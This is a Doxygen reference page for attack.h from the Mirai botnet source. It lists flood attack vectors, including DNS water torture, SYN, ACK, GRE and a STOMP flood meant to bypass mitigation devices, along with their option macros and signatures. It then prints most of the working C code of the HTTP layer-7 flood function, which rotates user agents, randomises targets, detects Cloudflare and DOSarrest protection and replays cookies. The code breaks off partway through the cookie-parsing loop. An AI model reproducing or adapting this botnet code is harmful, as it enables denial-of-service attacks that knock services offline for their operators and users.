Mirai: mirai/bot/attack.h File Reference
attack.h File Reference
#include <time.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/udp.h>
#include <linux/tcp.h>
#include "includes.h"
#include "protocol.h"
Data Structures
struct attack_target
struct attack_option
struct attack_method
struct attack_stomp_data
struct attack_http_state
struct attack_cfnull_state
Macros
#define ATTACK_CONCURRENT_MAX 8
#define HTTP_CONNECTION_MAX 256
#define ATK_VEC_UDP 0 /* Straight up UDP flood */
#define ATK_VEC_VSE 1 /* Valve Source Engine query flood */
#define ATK_VEC_DNS 2 /* DNS water torture */
#define ATK_VEC_SYN 3 /* SYN flood with options */
#define ATK_VEC_ACK 4 /* ACK flood */
#define ATK_VEC_STOMP 5 /* ACK flood to bypass mitigation devices */
#define ATK_VEC_GREIP 6 /* GRE IP flood */
#define ATK_VEC_GREETH 7 /* GRE Ethernet flood */
#define ATK_VEC_UDP_PLAIN 9 /* Plain UDP flood optimized for speed */
#define ATK_VEC_HTTP 10 /* HTTP layer 7 flood */
#define ATK_OPT_PAYLOAD_SIZE 0
#define ATK_OPT_PAYLOAD_RAND 1
#define ATK_OPT_IP_TOS 2
#define ATK_OPT_IP_IDENT 3
#define ATK_OPT_IP_TTL 4
#define ATK_OPT_IP_DF 5
#define ATK_OPT_SPORT 6
#define ATK_OPT_DPORT 7
#define ATK_OPT_DOMAIN 8
#define ATK_OPT_DNS_HDR_ID 9
#define ATK_OPT_URG 11
#define ATK_OPT_ACK 12
#define ATK_OPT_PSH 13
#define ATK_OPT_RST 14
#define ATK_OPT_SYN 15
#define ATK_OPT_FIN 16
#define ATK_OPT_SEQRND 17
#define ATK_OPT_ACKRND 18
#define ATK_OPT_GRE_CONSTIP 19
#define ATK_OPT_METHOD 20
#define ATK_OPT_POST_DATA 21
#define ATK_OPT_PATH 22
#define ATK_OPT_HTTPS 23
#define ATK_OPT_CONNS 24
#define ATK_OPT_SOURCE 25
#define HTTP_CONN_INIT 0
#define HTTP_CONN_RESTART 1
#define HTTP_CONN_CONNECTING 2
#define HTTP_CONN_HTTPS_STUFF 3
#define HTTP_CONN_SEND 4
#define HTTP_CONN_SEND_HEADERS 5
#define HTTP_CONN_RECV_HEADER 6
#define HTTP_CONN_RECV_BODY 7
#define HTTP_CONN_SEND_JUNK 8
#define HTTP_CONN_SNDBUF_WAIT 9
#define HTTP_CONN_QUEUE_RESTART 10
#define HTTP_CONN_CLOSED 11
#define HTTP_RDBUF_SIZE 1024
#define HTTP_HACK_DRAIN 64
#define HTTP_PATH_MAX 256
#define HTTP_DOMAIN_MAX 128
#define HTTP_COOKIE_MAX 5
#define HTTP_COOKIE_LEN_MAX 128
#define HTTP_POST_MAX 512
#define HTTP_PROT_DOSARREST 1
#define HTTP_PROT_CLOUDFLARE 2
Typedefs
typedef void(* ATTACK_FUNC) (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
typedef uint8_t ATTACK_VECTOR
Functions
BOOL attack_init (void)
void attack_kill_all (void)
void attack_parse (char *, int)
void attack_start (int, ATTACK_VECTOR, uint8_t, struct attack_target *, uint8_t, struct attack_option *)
char * attack_get_opt_str (uint8_t, struct attack_option *, uint8_t, char *)
int attack_get_opt_int (uint8_t, struct attack_option *, uint8_t, int)
uint32_t attack_get_opt_ip (uint8_t, struct attack_option *, uint8_t, uint32_t)
void attack_udp_generic (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_udp_vse (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_udp_dns (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_udp_plain (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_tcp_syn (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_tcp_ack (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_tcp_stomp (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_gre_ip (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_gre_eth (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_app_proxy (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
void attack_app_http (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
static void add_attack (ATTACK_VECTOR, ATTACK_FUNC)
static void free_opts (struct attack_option *, int)
Variables
struct attack_target __attribute__
Macro Definition Documentation
#define ATK_OPT_ACK 12
Definition at line 58 of file attack.h.
Referenced by attack_tcp_ack(), attack_tcp_stomp(), and attack_tcp_syn().
#define ATK_OPT_ACKRND 18
Definition at line 64 of file attack.h.
Referenced by attack_tcp_ack(), and attack_tcp_syn().
#define ATK_OPT_CONNS 24
Definition at line 70 of file attack.h.
Referenced by attack_app_cfnull(), and attack_app_http().
#define ATK_OPT_DNS_HDR_ID 9
Definition at line 55 of file attack.h.
Referenced by attack_udp_dns().
#define ATK_OPT_DOMAIN 8
Definition at line 54 of file attack.h.
Referenced by attack_app_cfnull(), attack_app_http(), and attack_udp_dns().
#define ATK_OPT_DPORT 7
Definition at line 53 of file attack.h.
Referenced by attack_app_http(), attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), attack_udp_plain(), and attack_udp_vse().
#define ATK_OPT_FIN 16
Definition at line 62 of file attack.h.
Referenced by attack_tcp_ack(), attack_tcp_stomp(), and attack_tcp_syn().
#define ATK_OPT_GRE_CONSTIP 19
Definition at line 65 of file attack.h.
Referenced by attack_gre_eth(), and attack_gre_ip().
#define ATK_OPT_HTTPS 23
Definition at line 69 of file attack.h.
#define ATK_OPT_IP_DF 5
Definition at line 51 of file attack.h.
Referenced by attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), and attack_udp_vse().
#define ATK_OPT_IP_IDENT 3
Definition at line 49 of file attack.h.
Referenced by attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), and attack_udp_vse().
#define ATK_OPT_IP_TOS 2
Definition at line 48 of file attack.h.
Referenced by attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), and attack_udp_vse().
#define ATK_OPT_IP_TTL 4
Definition at line 50 of file attack.h.
Referenced by attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), and attack_udp_vse().
#define ATK_OPT_METHOD 20
Definition at line 66 of file attack.h.
Referenced by attack_app_http().
#define ATK_OPT_PATH 22
Definition at line 68 of file attack.h.
Referenced by attack_app_http().
#define ATK_OPT_PAYLOAD_RAND 1
Definition at line 47 of file attack.h.
Referenced by attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_udp_generic(), and attack_udp_plain().
#define ATK_OPT_PAYLOAD_SIZE 0
Definition at line 46 of file attack.h.
Referenced by attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_udp_dns(), attack_udp_generic(), and attack_udp_plain().
#define ATK_OPT_POST_DATA 21
Definition at line 67 of file attack.h.
Referenced by attack_app_http().
#define ATK_OPT_PSH 13
Definition at line 59 of file attack.h.
Referenced by attack_tcp_ack(), attack_tcp_stomp(), and attack_tcp_syn().
#define ATK_OPT_RST 14
Definition at line 60 of file attack.h.
Referenced by attack_tcp_ack(), attack_tcp_stomp(), and attack_tcp_syn().
#define ATK_OPT_SEQRND 17
Definition at line 63 of file attack.h.
Referenced by attack_tcp_ack(), and attack_tcp_syn().
#define ATK_OPT_SOURCE 25
Definition at line 71 of file attack.h.
Referenced by attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_syn(), and attack_udp_generic().
#define ATK_OPT_SPORT 6
Definition at line 52 of file attack.h.
Referenced by attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), attack_udp_plain(), and attack_udp_vse().
#define ATK_OPT_SYN 15
Definition at line 61 of file attack.h.
Referenced by attack_tcp_ack(), attack_tcp_stomp(), and attack_tcp_syn().
#define ATK_OPT_URG 11
Definition at line 57 of file attack.h.
Referenced by attack_tcp_ack(), attack_tcp_stomp(), and attack_tcp_syn().
#define ATK_VEC_ACK 4 /* ACK flood */
Definition at line 38 of file attack.h.
Referenced by attack_init().
#define ATK_VEC_DNS 2 /* DNS water torture */
Definition at line 36 of file attack.h.
Referenced by attack_init().
#define ATK_VEC_GREETH 7 /* GRE Ethernet flood */
Definition at line 41 of file attack.h.
Referenced by attack_init().
#define ATK_VEC_GREIP 6 /* GRE IP flood */
Definition at line 40 of file attack.h.
Referenced by attack_init().
#define ATK_VEC_HTTP 10 /* HTTP layer 7 flood */
Definition at line 44 of file attack.h.
Referenced by attack_init().
#define ATK_VEC_STOMP 5 /* ACK flood to bypass mitigation devices */
Definition at line 39 of file attack.h.
Referenced by attack_init().
#define ATK_VEC_SYN 3 /* SYN flood with options */
Definition at line 37 of file attack.h.
Referenced by attack_init().
#define ATK_VEC_UDP 0 /* Straight up UDP flood */
Definition at line 34 of file attack.h.
Referenced by attack_init().
#define ATK_VEC_UDP_PLAIN 9 /* Plain UDP flood optimized for speed */
Definition at line 43 of file attack.h.
Referenced by attack_init().
#define ATK_VEC_VSE 1 /* Valve Source Engine query flood */
Definition at line 35 of file attack.h.
Referenced by attack_init().
#define ATTACK_CONCURRENT_MAX 8
Definition at line 12 of file attack.h.
Referenced by attack_kill_all().
#define HTTP_CONN_CLOSED 11
Definition at line 95 of file attack.h.
Referenced by attack_app_http().
#define HTTP_CONN_CONNECTING 2
Definition at line 86 of file attack.h.
Referenced by attack_app_cfnull(), and attack_app_http().
#define HTTP_CONN_HTTPS_STUFF 3
Definition at line 87 of file attack.h.
#define HTTP_CONN_INIT 0
Definition at line 84 of file attack.h.
Referenced by attack_app_cfnull(), and attack_app_http().
#define HTTP_CONN_QUEUE_RESTART 10
Definition at line 94 of file attack.h.
Referenced by attack_app_http().
#define HTTP_CONN_RECV_BODY 7
Definition at line 91 of file attack.h.
Referenced by attack_app_http().
#define HTTP_CONN_RECV_HEADER 6
Definition at line 90 of file attack.h.
Referenced by attack_app_http().
#define HTTP_CONN_RESTART 1
Definition at line 85 of file attack.h.
Referenced by attack_app_cfnull(), and attack_app_http().
#define HTTP_CONN_SEND 4
Definition at line 88 of file attack.h.
Referenced by attack_app_cfnull(), and attack_app_http().
#define HTTP_CONN_SEND_HEADERS 5
Definition at line 89 of file attack.h.
Referenced by attack_app_cfnull().
#define HTTP_CONN_SEND_JUNK 8
Definition at line 92 of file attack.h.
Referenced by attack_app_cfnull().
#define HTTP_CONN_SNDBUF_WAIT 9
Definition at line 93 of file attack.h.
Referenced by attack_app_cfnull().
#define HTTP_CONNECTION_MAX 256
Definition at line 17 of file attack.h.
Referenced by attack_app_cfnull(), and attack_app_http().
#define HTTP_COOKIE_LEN_MAX 128
Definition at line 102 of file attack.h.
Referenced by attack_app_http().
#define HTTP_COOKIE_MAX 5
Definition at line 101 of file attack.h.
Referenced by attack_app_http().
#define HTTP_DOMAIN_MAX 128
Definition at line 100 of file attack.h.
Referenced by attack_app_cfnull(), and attack_app_http().
#define HTTP_HACK_DRAIN 64
Definition at line 98 of file attack.h.
Referenced by attack_app_http().
#define HTTP_PATH_MAX 256
Definition at line 99 of file attack.h.
Referenced by attack_app_http().
#define HTTP_POST_MAX 512
Definition at line 103 of file attack.h.
#define HTTP_PROT_CLOUDFLARE 2
Definition at line 106 of file attack.h.
Referenced by attack_app_http().
#define HTTP_PROT_DOSARREST 1
Definition at line 105 of file attack.h.
Referenced by attack_app_http().
#define HTTP_RDBUF_SIZE 1024
Definition at line 97 of file attack.h.
Referenced by attack_app_http().
Typedef Documentation
typedef void(* ATTACK_FUNC) (uint8_t, struct attack_target *, uint8_t, struct attack_option *)
Definition at line 31 of file attack.h.
typedef uint8_t ATTACK_VECTOR
Definition at line 32 of file attack.h.
Function Documentation
static void add_attack (ATTACK_VECTOR , ATTACK_FUNC) static
void attack_app_http (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 26 of file attack_app.c.
References attack_target::addr, ATK_OPT_CONNS, ATK_OPT_DOMAIN, ATK_OPT_DPORT, ATK_OPT_METHOD, ATK_OPT_PATH, ATK_OPT_POST_DATA, attack_get_opt_int(), attack_get_opt_str(), attack_http_state::chunked, close, connect, attack_http_state::content_length, attack_http_state::cookies, domain(), attack_http_state::domain, attack_http_state::dst_addr, FALSE, attack_http_state::fd, HTTP_CONN_CLOSED, HTTP_CONN_CONNECTING, HTTP_CONN_INIT, HTTP_CONN_QUEUE_RESTART, HTTP_CONN_RECV_BODY, HTTP_CONN_RECV_HEADER, HTTP_CONN_RESTART, HTTP_CONN_SEND, HTTP_CONNECTION_MAX, HTTP_COOKIE_LEN_MAX, HTTP_COOKIE_MAX, HTTP_DOMAIN_MAX, HTTP_HACK_DRAIN, HTTP_PATH_MAX, HTTP_PROT_CLOUDFLARE, HTTP_PROT_DOSARREST, HTTP_RDBUF_SIZE, attack_http_state::keepalive, attack_http_state::last_recv, attack_http_state::last_send, attack_http_state::method, attack_http_state::num_cookies, attack_http_state::orig_method, attack_http_state::path, attack_http_state::postdata, attack_http_state::protection_type, rand_next(), attack_http_state::rdbuf, attack_http_state::rdbuf_pos, socket, attack_http_state::state, TABLE_ATK_ACCEPT, TABLE_ATK_ACCEPT_LNG, TABLE_ATK_CHUNKED, TABLE_ATK_CLOUDFLARE_NGINX, TABLE_ATK_CONNECTION_HDR, TABLE_ATK_CONTENT_LENGTH_HDR, TABLE_ATK_CONTENT_TYPE, TABLE_ATK_DOSARREST, TABLE_ATK_KEEP_ALIVE, TABLE_ATK_KEEP_ALIVE_HDR, TABLE_ATK_LOCATION_HDR, TABLE_ATK_REFRESH_HDR, TABLE_ATK_SET_COOKIE, TABLE_ATK_SET_COOKIE_HDR, TABLE_ATK_TRANSFER_ENCODING_HDR, TABLE_HTTP_FIVE, TABLE_HTTP_FOUR, TABLE_HTTP_ONE, TABLE_HTTP_THREE, TABLE_HTTP_TWO, table_lock_val(), table_retrieve_val(), table_unlock_val(), TRUE, attack_http_state::user_agent, util_atoi(), util_itoa(), util_memsearch(), util_strcmp(), util_strcpy(), util_stristr(), util_strlen(), util_strncmp(), and util_zero().
Referenced by attack_init().
 {
     int i, ii, rfd, ret = 0;
     struct attack_http_state *http_table = NULL;
     char *postdata = attack_get_opt_str(opts_len, opts, ATK_OPT_POST_DATA, NULL);
     char *method = attack_get_opt_str(opts_len, opts, ATK_OPT_METHOD, "GET");
     char *domain = attack_get_opt_str(opts_len, opts, ATK_OPT_DOMAIN, NULL);
     char *path = attack_get_opt_str(opts_len, opts, ATK_OPT_PATH, "/");
     int sockets = attack_get_opt_int(opts_len, opts, ATK_OPT_CONNS, 1);
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 80);
     char generic_memes[10241] = {0};
     if (domain == NULL || path == NULL)
         return;
     if (util_strlen(path) > HTTP_PATH_MAX - 1)
         return;
     if (util_strlen(domain) > HTTP_DOMAIN_MAX - 1)
         return;
     if (util_strlen(method) > 9)
         return;
     // BUT BRAH WHAT IF METHOD IS THE DEFAULT VALUE WONT IT SEGFAULT CAUSE READ ONLY STRING?
     // yes it would segfault but we only update the values if they are not already uppercase.
     // if the method is lowercase and its passed from the CNC we can update that memory no problem
     for (ii = 0; ii < util_strlen(method); ii++)
         if (method[ii] >= 'a' && method[ii] <= 'z')
             method[ii] -= 32;
     if (sockets > HTTP_CONNECTION_MAX)
         sockets = HTTP_CONNECTION_MAX;
     // unlock frequently used strings
     table_unlock_val(TABLE_ATK_SET_COOKIE);
     table_unlock_val(TABLE_ATK_REFRESH_HDR);
     table_unlock_val(TABLE_ATK_LOCATION_HDR);
     table_unlock_val(TABLE_ATK_SET_COOKIE_HDR);
     table_unlock_val(TABLE_ATK_CONTENT_LENGTH_HDR);
     table_unlock_val(TABLE_ATK_TRANSFER_ENCODING_HDR);
     table_unlock_val(TABLE_ATK_CHUNKED);
     table_unlock_val(TABLE_ATK_KEEP_ALIVE_HDR);
     table_unlock_val(TABLE_ATK_CONNECTION_HDR);
     table_unlock_val(TABLE_ATK_DOSARREST);
     table_unlock_val(TABLE_ATK_CLOUDFLARE_NGINX);
     http_table = calloc(sockets, sizeof(struct attack_http_state));
     for (i = 0; i < sockets; i++)
     {
         http_table[i].state = HTTP_CONN_INIT;
         http_table[i].fd = -1;
         http_table[i].dst_addr = targs[i % targs_len].addr;
         util_strcpy(http_table[i].path, path);
         if (http_table[i].path[0] != '/')
         {
             memmove(http_table[i].path + 1, http_table[i].path, util_strlen(http_table[i].path));
             http_table[i].path[0] = '/';
         }
         util_strcpy(http_table[i].orig_method, method);
         util_strcpy(http_table[i].method, method);
         util_strcpy(http_table[i].domain, domain);
         if (targs[i % targs_len].netmask < 32)
             http_table[i].dst_addr = htonl(ntohl(targs[i % targs_len].addr) + (((uint32_t)rand_next()) >> targs[i % targs_len].netmask));
         switch(rand_next() % 5)
         {
             case 0:
                 table_unlock_val(TABLE_HTTP_ONE);
                 util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_ONE, NULL));
                 table_lock_val(TABLE_HTTP_ONE);
                 break;
             case 1:
                 table_unlock_val(TABLE_HTTP_TWO);
                 util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_TWO, NULL));
                 table_lock_val(TABLE_HTTP_TWO);
                 break;
             case 2:
                 table_unlock_val(TABLE_HTTP_THREE);
                 util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_THREE, NULL));
                 table_lock_val(TABLE_HTTP_THREE);
                 break;
             case 3:
                 table_unlock_val(TABLE_HTTP_FOUR);
                 util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FOUR, NULL));
                 table_lock_val(TABLE_HTTP_FOUR);
                 break;
             case 4:
                 table_unlock_val(TABLE_HTTP_FIVE);
                 util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FIVE, NULL));
                 table_lock_val(TABLE_HTTP_FIVE);
                 break;
         }
         util_strcpy(http_table[i].path, path);
     }
     while(TRUE)
     {
         fd_set fdset_rd, fdset_wr;
         int mfd = 0, nfds;
         struct timeval tim;
         struct attack_http_state *conn;
         uint32_t fake_time = time(NULL);
         FD_ZERO(&fdset_rd);
         FD_ZERO(&fdset_wr);
         for (i = 0; i < sockets; i++)
         {
             conn = &(http_table[i]);
             if (conn->state == HTTP_CONN_RESTART)
             {
                 if (conn->keepalive)
                     conn->state = HTTP_CONN_SEND;
                 else
                     conn->state = HTTP_CONN_INIT;
             }
             if (conn->state == HTTP_CONN_INIT)
             {
                 struct sockaddr_in addr = {0};
                 if (conn->fd != -1)
                     close(conn->fd);
                 if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
                     continue;
                 fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
                 ii = 65535;
                 setsockopt(conn->fd, 0, SO_RCVBUF, &ii ,sizeof(int));
                 addr.sin_family = AF_INET;
                 addr.sin_addr.s_addr = conn->dst_addr;
                 addr.sin_port = htons(dport);
                 conn->last_recv = fake_time;
                 conn->state = HTTP_CONN_CONNECTING;
                 connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
 #ifdef DEBUG
                 printf("[http flood] fd%d started connect\n", conn->fd);
 #endif
                 FD_SET(conn->fd, &fdset_wr);
                 if (conn->fd > mfd)
                     mfd = conn->fd + 1;
             }
             else if (conn->state == HTTP_CONN_CONNECTING)
             {
                 if (fake_time - conn->last_recv > 30)
                 {
                     conn->state = HTTP_CONN_INIT;
                     close(conn->fd);
                     conn->fd = -1;
                     continue;
                 }
                 FD_SET(conn->fd, &fdset_wr);
                 if (conn->fd > mfd)
                     mfd = conn->fd + 1;
             }
             else if (conn->state == HTTP_CONN_SEND)
             {
                 conn->content_length = -1;
                 conn->protection_type = 0;
                 util_zero(conn->rdbuf, HTTP_RDBUF_SIZE);
                 conn->rdbuf_pos = 0;
 #ifdef DEBUG
                 //printf("[http flood] Sending http request\n");
 #endif
                 char buf[10240];
                 util_zero(buf, 10240);
                 util_strcpy(buf + util_strlen(buf), conn->method);
                 util_strcpy(buf + util_strlen(buf), " ");
                 util_strcpy(buf + util_strlen(buf), conn->path);
                 util_strcpy(buf + util_strlen(buf), " HTTP/1.1\r\nUser-Agent: ");
                 util_strcpy(buf + util_strlen(buf), conn->user_agent);
                 util_strcpy(buf + util_strlen(buf), "\r\nHost: ");
                 util_strcpy(buf + util_strlen(buf), conn->domain);
                 util_strcpy(buf + util_strlen(buf), "\r\n");
                 table_unlock_val(TABLE_ATK_KEEP_ALIVE);
                 util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_KEEP_ALIVE, NULL));
                 table_lock_val(TABLE_ATK_KEEP_ALIVE);
                 util_strcpy(buf + util_strlen(buf), "\r\n");
                 table_unlock_val(TABLE_ATK_ACCEPT);
                 util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT, NULL));
                 table_lock_val(TABLE_ATK_ACCEPT);
                 util_strcpy(buf + util_strlen(buf), "\r\n");
                 table_unlock_val(TABLE_ATK_ACCEPT_LNG);
                 util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT_LNG, NULL));
                 table_lock_val(TABLE_ATK_ACCEPT_LNG);
                 util_strcpy(buf + util_strlen(buf), "\r\n");
                 if (postdata != NULL)
                 {
                     table_unlock_val(TABLE_ATK_CONTENT_TYPE);
                     util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_CONTENT_TYPE, NULL));
                     table_lock_val(TABLE_ATK_CONTENT_TYPE);
                     util_strcpy(buf + util_strlen(buf), "\r\n");
                     util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_CONTENT_LENGTH_HDR, NULL));
                     util_strcpy(buf + util_strlen(buf), " ");
                     util_itoa(util_strlen(postdata), 10, buf + util_strlen(buf));
                     util_strcpy(buf + util_strlen(buf), "\r\n");
                 }
                 if (conn->num_cookies > 0)
                 {
                     util_strcpy(buf + util_strlen(buf), "Cookie: ");
                     for (ii = 0; ii < conn->num_cookies; ii++)
                     {
                         util_strcpy(buf + util_strlen(buf), conn->cookies[ii]);
                         util_strcpy(buf + util_strlen(buf), "; ");
                     }
                     util_strcpy(buf + util_strlen(buf), "\r\n");
                 }
                 util_strcpy(buf + util_strlen(buf), "\r\n");
                 if (postdata != NULL)
                     util_strcpy(buf + util_strlen(buf), postdata);
                 if (!util_strcmp(conn->method, conn->orig_method))
                     util_strcpy(conn->method, conn->orig_method);
 #ifdef DEBUG
                 if (sockets == 1)
                 {
                     printf("sending buf: \"%s\"\n", buf);
                 }
 #endif
                 send(conn->fd, buf, util_strlen(buf), MSG_NOSIGNAL);
                 conn->last_send = fake_time;
                 conn->state = HTTP_CONN_RECV_HEADER;
                 FD_SET(conn->fd, &fdset_rd);
                 if (conn->fd > mfd)
                     mfd = conn->fd + 1;
             }
             else if (conn->state == HTTP_CONN_RECV_HEADER)
             {
                 FD_SET(conn->fd, &fdset_rd);
                 if (conn->fd > mfd)
                     mfd = conn->fd + 1;
             }
             else if (conn->state == HTTP_CONN_RECV_BODY)
             {
                 FD_SET(conn->fd, &fdset_rd);
                 if (conn->fd > mfd)
                     mfd = conn->fd + 1;
             }
             else if (conn->state == HTTP_CONN_QUEUE_RESTART)
             {
                 FD_SET(conn->fd, &fdset_rd);
                 if (conn->fd > mfd)
                     mfd = conn->fd + 1;
             }
             else if (conn->state == HTTP_CONN_CLOSED)
             {
                 conn->state = HTTP_CONN_INIT;
                 close(conn->fd);
                 conn->fd = -1;
             }
             else
             {
                 // NEW STATE WHO DIS
                 conn->state = HTTP_CONN_INIT;
                 close(conn->fd);
                 conn->fd = -1;
             }
         }
         if (mfd == 0)
             continue;
         tim.tv_usec = 0;
         tim.tv_sec = 1;
         nfds = select(mfd, &fdset_rd, &fdset_wr, NULL, &tim);
         fake_time = time(NULL);
         if (nfds < 1)
             continue;
         for (i = 0; i < sockets; i++)
         {
             conn = &(http_table[i]);
             if (conn->fd == -1)
                 continue;
             if (FD_ISSET(conn->fd, &fdset_wr))
             {
                 int err = 0;
                 socklen_t err_len = sizeof (err);
                 ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
                 if (err == 0 && ret == 0)
                 {
 #ifdef DEBUG
                     printf("[http flood] FD%d connected.\n", conn->fd);
 #endif
                         conn->state = HTTP_CONN_SEND;
                 }
                 else
                 {
 #ifdef DEBUG
                     printf("[http flood] FD%d error while connecting = %d\n", conn->fd, err);
 #endif
                     close(conn->fd);
                     conn->fd = -1;
                     conn->state = HTTP_CONN_INIT;
                     continue;
                 }
             }
         if (FD_ISSET(conn->fd, &fdset_rd))
             {
                 if (conn->state == HTTP_CONN_RECV_HEADER)
                 {
                     int processed = 0;
                     util_zero(generic_memes, 10240);
                     if ((ret = recv(conn->fd, generic_memes, 10240, MSG_NOSIGNAL | MSG_PEEK)) < 1)
                     {
                         close(conn->fd);
                         conn->fd = -1;
                         conn->state = HTTP_CONN_INIT;
                         continue;
                     }
                     // we want to process a full http header (^:
                     if (util_memsearch(generic_memes, ret, "\r\n\r\n", 4) == -1 && ret < 10240)
                         continue;
                     generic_memes[util_memsearch(generic_memes, ret, "\r\n\r\n", 4)] = 0;
 #ifdef DEBUG
                     if (sockets == 1)
                         printf("[http flood] headers: \"%s\"\n", generic_memes);
 #endif
                     if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CLOUDFLARE_NGINX, NULL)) != -1)
                         conn->protection_type = HTTP_PROT_CLOUDFLARE;
                     if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_DOSARREST, NULL)) != -1)
                         conn->protection_type = HTTP_PROT_DOSARREST;
                     conn->keepalive = 0;
                     if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONNECTION_HDR, NULL)) != -1)
                     {
                         int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONNECTION_HDR, NULL));
                         if (generic_memes[offset] == ' ')
                             offset++;
                         int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
                         if (nl_off != -1)
{
                             char *con_ptr = &(generic_memes[offset]);
                             if (nl_off >= 2)
                                 nl_off -= 2;
                             generic_memes[offset + nl_off] = 0;
                             if (util_stristr(con_ptr, util_strlen(con_ptr), table_retrieve_val(TABLE_ATK_KEEP_ALIVE_HDR, NULL)))
                                 conn->keepalive = 1;
                         }
                     }
                     conn->chunked = 0;
                     if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_TRANSFER_ENCODING_HDR, NULL)) != -1)
                     {
                         int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_TRANSFER_ENCODING_HDR, NULL));
                         if (generic_memes[offset] == ' ')
                             offset++;
                         int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
                         if (nl_off != -1)
{
                             char *con_ptr = &(generic_memes[offset]);
                             if (nl_off >= 2)
                                 nl_off -= 2;
                             generic_memes[offset + nl_off] = 0;
                             if (util_stristr(con_ptr, util_strlen(con_ptr), table_retrieve_val(TABLE_ATK_CHUNKED, NULL)))
                                 conn->chunked = 1;
                         }
                     }
                     if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONTENT_LENGTH_HDR, NULL)) != -1)
                     {
                         int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONTENT_LENGTH_HDR, NULL));
                         if (generic_memes[offset] == ' ')
                             offset++;
                         int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
                         if (nl_off != -1)
{
                             char *len_ptr = &(generic_memes[offset]);
                             if (nl_off >= 2)
                                 nl_off -= 2;
                             generic_memes[offset + nl_off] = 0;
                             conn->content_length = util_atoi(len_ptr, 10);
                         }
                     } else {
                         conn->content_length = 0;
                     }
                     processed = 0;
                     while (util_stristr(generic_memes + processed, ret, table_retrieve_val(TABLE_ATK_SET_COOKIE_HDR, NULL)) != -1 && conn->num_cookies < HTTP_COOKIE_MAX)
                     {
                         int offset = util_stristr(generic_memes + processed, ret, table_retrieve_val(TABLE_ATK_SET_COOKIE_HDR, NULL));
                         if (generic_memes[processed + offset] == ' ')
                             offset++;
                         int nl_off = util_memsearch(generic_memes + processed + offset, ret - processed - offset, "\r\n", 2);
                         if (nl_off != -1)
{
                             char *cookie_ptr = &(generic_memes[processed + offset]);
                             if (nl_off >= 2)
                                 nl_off -= 2;
                             if (util_memsearch(generic_memes + processed + offset, ret - processed - offset, ";", 1) > 0)
                                 nl_off = util_memsearch(generic_memes + processed + offset, ret - processed - offset, ";", 1) - 1;
                             generic_memes[processed + offset + nl_off] = 0;
                             for (ii = 0; ii < util_strlen(cookie_ptr); ii++)
                                 if (cookie_ptr[ii] == '=')
                                     break;
                             if (cookie_ptr[ii] == '=')
{
                                 int equal_off = ii, cookie_exists = FALSE;
                                 for (ii = 0; ii < conn->num_cookies; ii++)
                                     if (util_strncmp(cookie_ptr, conn->cookies[ii], equal_off))
{
                                         cookie_exists = TRUE;
                                         break;
                                     }
                                 if (!cookie_exists)
{
                                     if (util_strlen(cookie_ptr) < HTTP_COOKIE_LEN_MAX)
{
                                         util_strcpy(conn->cookies[conn->num_cookies], cookie_ptr);
                                         conn->num_cookies++;
